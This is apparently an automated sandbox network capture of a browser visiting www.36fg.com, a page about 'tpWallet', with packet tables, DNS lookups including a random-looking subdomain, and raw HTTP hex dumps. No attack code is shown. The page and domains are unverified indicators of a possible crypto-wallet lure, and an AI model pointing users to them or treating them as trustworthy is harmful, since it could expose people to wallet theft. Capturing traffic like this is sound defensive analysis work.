                                                        Mar 15, 2025 01:18:00.929555893 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:00.929579020 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:00.929610014 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:00.929614067 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:00.929646969 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:00.975631952 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:00.979387045 CET4434979435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:18:00.979948997 CET49794443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:18:00.979969025 CET4434979435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:18:00.980119944 CET49794443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:18:00.980125904 CET4434979435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.015788078 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.015814066 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.015870094 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.015882969 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.015898943 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.015923977 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.016213894 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.016236067 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.016267061 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.016272068 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.016309977 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.016324043 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.016522884 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.016561031 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.016573906 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.016577959 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.016613007 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.016621113 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.016779900 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.016802073 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.016830921 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.016834974 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.016861916 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.016880989 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.017215014 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.017240047 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.017277002 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.017281055 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.017307997 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.017322063 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.017337084 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.017379999 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.017385006 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.017420053 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.017462015 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.017745018 CET49793443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:01.017760992 CET44349793104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.106312037 CET4434979435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.106395960 CET4434979435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:18:01.106447935 CET49794443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:18:01.106595993 CET49794443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:18:01.106617928 CET4434979435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:18:02.635577917 CET44349732216.58.206.68192.168.2.5
                                                        Mar 15, 2025 01:18:02.635642052 CET44349732216.58.206.68192.168.2.5
                                                        Mar 15, 2025 01:18:02.635797024 CET49732443192.168.2.5216.58.206.68
                                                        Mar 15, 2025 01:18:04.094362020 CET49732443192.168.2.5216.58.206.68
                                                        Mar 15, 2025 01:18:04.094389915 CET44349732216.58.206.68192.168.2.5
                                                        Mar 15, 2025 01:18:12.268649101 CET49795443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:12.268683910 CET44349795104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:12.268848896 CET49795443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:12.269404888 CET49795443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:12.269423008 CET44349795104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:12.729170084 CET44349795104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:12.729475975 CET49795443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:12.729504108 CET44349795104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:27.042730093 CET4970180192.168.2.5142.250.185.99
                                                        Mar 15, 2025 01:18:27.042876005 CET4969480192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:18:27.042947054 CET4969680192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:18:27.047698975 CET8049701142.250.185.99192.168.2.5
                                                        Mar 15, 2025 01:18:27.047755003 CET4970180192.168.2.5142.250.185.99
                                                        Mar 15, 2025 01:18:27.048095942 CET8049694199.232.214.172192.168.2.5
                                                        Mar 15, 2025 01:18:27.048141003 CET8049696199.232.214.172192.168.2.5
                                                        Mar 15, 2025 01:18:27.048172951 CET4969480192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:18:27.048203945 CET4969680192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:18:27.636394024 CET44349795104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:27.636454105 CET44349795104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:27.636584997 CET49795443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:28.094224930 CET49795443192.168.2.5104.21.64.1
                                                        Mar 15, 2025 01:18:28.094275951 CET44349795104.21.64.1192.168.2.5
                                                        Mar 15, 2025 01:18:32.018136978 CET4971080192.168.2.52.23.77.188
                                                        Mar 15, 2025 01:18:52.124798059 CET49801443192.168.2.5216.58.206.68
                                                        Mar 15, 2025 01:18:52.124845982 CET44349801216.58.206.68192.168.2.5
                                                        Mar 15, 2025 01:18:52.124970913 CET49801443192.168.2.5216.58.206.68
                                                        Mar 15, 2025 01:18:52.125224113 CET49801443192.168.2.5216.58.206.68
                                                        Mar 15, 2025 01:18:52.125240088 CET44349801216.58.206.68192.168.2.5
                                                        Mar 15, 2025 01:18:52.786634922 CET44349801216.58.206.68192.168.2.5
                                                        Mar 15, 2025 01:18:52.787112951 CET49801443192.168.2.5216.58.206.68
                                                        Mar 15, 2025 01:18:52.787134886 CET44349801216.58.206.68192.168.2.5
                                                        Mar 15, 2025 01:18:59.906282902 CET49804443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:18:59.906332016 CET4434980435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:18:59.906399012 CET49804443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:18:59.906626940 CET49804443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:18:59.906639099 CET4434980435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.380248070 CET4434980435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.380691051 CET49804443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:00.380723000 CET4434980435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.380836964 CET49804443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:00.380842924 CET4434980435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.510396004 CET4434980435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.510478020 CET4434980435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.510695934 CET49804443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:00.510720968 CET4434980435.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.510746002 CET49804443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:00.510787010 CET49804443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:00.511415005 CET49805443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:00.511470079 CET4434980535.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.511533022 CET49805443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:00.511657000 CET49805443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:00.511674881 CET4434980535.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.965831041 CET4434980535.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.966284990 CET49805443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:00.966305017 CET4434980535.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.966442108 CET49805443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:00.966449022 CET4434980535.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:00.966466904 CET49805443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:00.966475964 CET4434980535.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:01.094547987 CET4434980535.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:01.094626904 CET4434980535.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:01.094836950 CET49805443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:01.094880104 CET49805443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:01.094880104 CET49805443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:01.094907999 CET4434980535.190.80.1192.168.2.5
                                                        Mar 15, 2025 01:19:01.094986916 CET49805443192.168.2.535.190.80.1
                                                        Mar 15, 2025 01:19:02.686486006 CET44349801216.58.206.68192.168.2.5
                                                        Mar 15, 2025 01:19:02.686547041 CET44349801216.58.206.68192.168.2.5
                                                        Mar 15, 2025 01:19:02.686590910 CET49801443192.168.2.5216.58.206.68
                                                        Mar 15, 2025 01:19:04.094085932 CET49801443192.168.2.5216.58.206.68
                                                        Mar 15, 2025 01:19:04.094115973 CET44349801216.58.206.68192.168.2.5
                                                        Mar 15, 2025 01:19:13.452514887 CET4969980192.168.2.52.23.77.188
                                                        Mar 15, 2025 01:19:13.452517986 CET4969880192.168.2.52.23.77.188
                                                        Mar 15, 2025 01:19:13.452595949 CET4970280192.168.2.52.23.77.188
                                                        Mar 15, 2025 01:19:13.452600956 CET4969780192.168.2.52.23.77.188
                                                        Mar 15, 2025 01:19:13.452677965 CET4968980192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:19:13.452708960 CET4969080192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:19:13.452876091 CET4969180192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:19:13.452955961 CET4969280192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:19:13.453006029 CET49685443192.168.2.540.126.31.131
                                                        Mar 15, 2025 01:19:13.453006983 CET49687443192.168.2.540.126.31.131
                                                        Mar 15, 2025 01:19:13.453113079 CET49686443192.168.2.540.126.31.131
                                                        Mar 15, 2025 01:19:13.453208923 CET49684443192.168.2.540.126.31.131
                                                        Mar 15, 2025 01:19:13.457423925 CET80496992.23.77.188192.168.2.5
                                                        Mar 15, 2025 01:19:13.458503962 CET80496982.23.77.188192.168.2.5
                                                        Mar 15, 2025 01:19:13.458515882 CET80497022.23.77.188192.168.2.5
                                                        Mar 15, 2025 01:19:13.458525896 CET80496972.23.77.188192.168.2.5
                                                        Mar 15, 2025 01:19:13.458576918 CET8049689199.232.214.172192.168.2.5
                                                        Mar 15, 2025 01:19:13.458580971 CET4969880192.168.2.52.23.77.188
                                                        Mar 15, 2025 01:19:13.458580971 CET4969980192.168.2.52.23.77.188
                                                        Mar 15, 2025 01:19:13.458586931 CET8049690199.232.214.172192.168.2.5
                                                        Mar 15, 2025 01:19:13.458604097 CET8049691199.232.214.172192.168.2.5
                                                        Mar 15, 2025 01:19:13.458612919 CET4969780192.168.2.52.23.77.188
                                                        Mar 15, 2025 01:19:13.458612919 CET4970280192.168.2.52.23.77.188
                                                        Mar 15, 2025 01:19:13.458614111 CET8049692199.232.214.172192.168.2.5
                                                        Mar 15, 2025 01:19:13.458648920 CET4434968540.126.31.131192.168.2.5
                                                        Mar 15, 2025 01:19:13.458648920 CET4968980192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:19:13.458658934 CET4434968740.126.31.131192.168.2.5
                                                        Mar 15, 2025 01:19:13.458687067 CET4969280192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:19:13.458690882 CET4969180192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:19:13.458692074 CET4969080192.168.2.5199.232.214.172
                                                        Mar 15, 2025 01:19:13.458704948 CET49685443192.168.2.540.126.31.131
                                                        Mar 15, 2025 01:19:13.458705902 CET49687443192.168.2.540.126.31.131
                                                        Mar 15, 2025 01:19:13.459872961 CET4434968640.126.31.131192.168.2.5
                                                        Mar 15, 2025 01:19:13.460388899 CET49686443192.168.2.540.126.31.131
                                                        Mar 15, 2025 01:19:13.461859941 CET4434968440.126.31.131192.168.2.5
                                                        Mar 15, 2025 01:19:13.464148998 CET49684443192.168.2.540.126.31.131
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 15, 2025 01:17:47.579056978 CET53628131.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:47.697164059 CET53540691.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:49.330279112 CET53535781.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:49.481811047 CET53518241.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:52.062737942 CET6101453192.168.2.51.1.1.1
                                                        Mar 15, 2025 01:17:52.062870026 CET5352653192.168.2.51.1.1.1
                                                        Mar 15, 2025 01:17:52.069407940 CET53610141.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:52.069551945 CET53535261.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:52.899656057 CET4993253192.168.2.51.1.1.1
                                                        Mar 15, 2025 01:17:52.899960995 CET5406053192.168.2.51.1.1.1
                                                        Mar 15, 2025 01:17:52.914160967 CET53540601.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:52.921910048 CET53499321.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:55.916414022 CET5623753192.168.2.51.1.1.1
                                                        Mar 15, 2025 01:17:55.916631937 CET5409353192.168.2.51.1.1.1
                                                        Mar 15, 2025 01:17:55.932482958 CET53540931.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:55.953470945 CET53562371.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:56.106683969 CET6195353192.168.2.51.1.1.1
                                                        Mar 15, 2025 01:17:56.106914997 CET5718953192.168.2.51.1.1.1
                                                        Mar 15, 2025 01:17:56.126385927 CET53619531.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:56.129724026 CET53571891.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:58.048418045 CET53528751.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:58.051862955 CET53627921.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:59.905728102 CET6199653192.168.2.51.1.1.1
                                                        Mar 15, 2025 01:17:59.905728102 CET5884053192.168.2.51.1.1.1
                                                        Mar 15, 2025 01:17:59.912328959 CET53619961.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:17:59.912653923 CET53588401.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:18:06.554677963 CET53620741.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:18:25.272839069 CET53605311.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:18:40.566921949 CET138138192.168.2.5192.168.2.255
                                                        Mar 15, 2025 01:18:47.323097944 CET53595881.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:18:47.773580074 CET53591631.1.1.1192.168.2.5
                                                        Mar 15, 2025 01:18:50.818981886 CET53587101.1.1.1192.168.2.5
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Mar 15, 2025 01:17:52.062737942 CET192.168.2.51.1.1.10xffedStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.062870026 CET192.168.2.51.1.1.10x52e0Standard query (0)www.google.com65IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.899656057 CET192.168.2.51.1.1.10x76efStandard query (0)www.36fg.comA (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.899960995 CET192.168.2.51.1.1.10x2385Standard query (0)www.36fg.com65IN (0x0001)false
                                                        Mar 15, 2025 01:17:55.916414022 CET192.168.2.51.1.1.10x9c0aStandard query (0)www.36fg.comA (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:55.916631937 CET192.168.2.51.1.1.10xfac0Standard query (0)www.36fg.com65IN (0x0001)false
                                                        Mar 15, 2025 01:17:56.106683969 CET192.168.2.51.1.1.10x23d0Standard query (0)oudngmslhifnsf.gdmgcyy.comA (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:56.106914997 CET192.168.2.51.1.1.10xee9cStandard query (0)oudngmslhifnsf.gdmgcyy.com65IN (0x0001)false
                                                        Mar 15, 2025 01:17:59.905728102 CET192.168.2.51.1.1.10x13aStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                        Mar 15, 2025 01:17:59.905728102 CET192.168.2.51.1.1.10x22efStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Mar 15, 2025 01:17:52.069407940 CET1.1.1.1192.168.2.50xffedNo error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.069551945 CET1.1.1.1192.168.2.50x52e0No error (0)www.google.com65IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.914160967 CET1.1.1.1192.168.2.50x2385No error (0)www.36fg.com65IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.921910048 CET1.1.1.1192.168.2.50x76efNo error (0)www.36fg.com104.21.64.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.921910048 CET1.1.1.1192.168.2.50x76efNo error (0)www.36fg.com104.21.32.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.921910048 CET1.1.1.1192.168.2.50x76efNo error (0)www.36fg.com104.21.112.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.921910048 CET1.1.1.1192.168.2.50x76efNo error (0)www.36fg.com104.21.80.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.921910048 CET1.1.1.1192.168.2.50x76efNo error (0)www.36fg.com104.21.96.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.921910048 CET1.1.1.1192.168.2.50x76efNo error (0)www.36fg.com104.21.48.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:52.921910048 CET1.1.1.1192.168.2.50x76efNo error (0)www.36fg.com104.21.16.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:55.932482958 CET1.1.1.1192.168.2.50xfac0No error (0)www.36fg.com65IN (0x0001)false
                                                        Mar 15, 2025 01:17:55.953470945 CET1.1.1.1192.168.2.50x9c0aNo error (0)www.36fg.com104.21.64.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:55.953470945 CET1.1.1.1192.168.2.50x9c0aNo error (0)www.36fg.com104.21.80.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:55.953470945 CET1.1.1.1192.168.2.50x9c0aNo error (0)www.36fg.com104.21.32.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:55.953470945 CET1.1.1.1192.168.2.50x9c0aNo error (0)www.36fg.com104.21.16.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:55.953470945 CET1.1.1.1192.168.2.50x9c0aNo error (0)www.36fg.com104.21.96.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:55.953470945 CET1.1.1.1192.168.2.50x9c0aNo error (0)www.36fg.com104.21.112.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:55.953470945 CET1.1.1.1192.168.2.50x9c0aNo error (0)www.36fg.com104.21.48.1A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:56.126385927 CET1.1.1.1192.168.2.50x23d0No error (0)oudngmslhifnsf.gdmgcyy.com156.224.2.38A (IP address)IN (0x0001)false
                                                        Mar 15, 2025 01:17:59.912653923 CET1.1.1.1192.168.2.50x22efNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                        • www.36fg.com
                                                          • oudngmslhifnsf.gdmgcyy.com
                                                        • a.nel.cloudflare.com
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549734104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:53 UTC683OUTGET /tp-Related/18104.html HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-15 00:17:53 UTC915INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:53 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Server: cloudflare
                                                        Vary: Accept-Encoding
                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                        Pragma: no-cache
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cf-Cache-Status: DYNAMIC
                                                        Set-Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6; Path=/
                                                        Set-Cookie: DedeUserID=deleted; Path=/; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:01 GMT
                                                        Set-Cookie: DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=deleted; Path=/; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:01 GMT
                                                        Set-Cookie: DedeLoginTime=deleted; Path=/; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:01 GMT
                                                        Set-Cookie: DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=deleted; Path=/; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:01 GMT
                                                        CF-RAY: 9207d4953fb22f06-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-15 00:17:53 UTC454INData Raw: 31 66 65 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 74 70 57 61 6c 6c 65 74 e8 b4 a6 e6 88 b7 e6 bf 80 e6 b4 bb e6 8c 87 e5 8d 97 ef bc 9a e8 a7 a3 e5 86 b3 e2 80 9c e6 82 a8 e7 9a 84 e8 b4 a6 e6 88 b7 e5 b0 9a e6 9c aa e6 bf 80 e6 b4 bb e2 80 9d 5f 74 70 77 61 6c 6c 65 74 e5 85 8d e8 b4 b9 e5 ae 89 e8 a3 85 3c 2f 74 69 74 6c 65 3e 0a 20
                                                        Data Ascii: 1fe8<!doctype html><html class="no-js" lang="zh-CN"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>tpWallet_tpwallet</title>
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 9a 84 e8 b5 84 e9 87 91 e3 80 82 74 70 57 61 6c 6c 65 74 e4 bd 9c e4 b8 ba e4 b8 80 e7 a7 8d e6 96 b0 e5 85 b4 e7 9a 84 e6 95 b0 e5 ad 97 e9 92 b1 e5 8c 85 ef bc 8c e5 8f 97 e5 88 b0 e4 ba 86 e4 bc 97 e5 a4 9a e7 94 a8 e6 88 b7 e7 9a 84 e6 ac a2 e8 bf 8e e3 80 82 e7 84 b6 e8 80 8c ef bc 8c e6 9c 89 e4 ba 9b e7 94 a8 e6 88 b7 e5 9c a8 e5 88 9b e5 bb ba e8 b4 a6 e6 88 b7 e5 90 8e ef bc 8c e5 8f af e8 83 bd e4 bc 9a e9 81 87 e5 88 b0 e2 80 9c e6 82 a8 e7 9a 84 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 63 73 73 20 68 65 72 65 20 2d 2d 3e 0a 20
                                                        Data Ascii: tpWallet" /> <meta name="viewport" content="width=device-width, initial-scale=1"> ... css here -->
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 6c 6f 67 6f 20 73 74 61 72 74 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 32 20 63 6f 6c 2d 6c 67 2d 32 20 63 6f 6c 2d 6d 64 2d 32 20 63 6f 6c 2d 73 6d 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 6c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: a"> <div class="container"> <div class="row"> ... logo start --> <div class="col-xl-2 col-lg-2 col-md-2 col-sm-3"> <div class="header-logo">
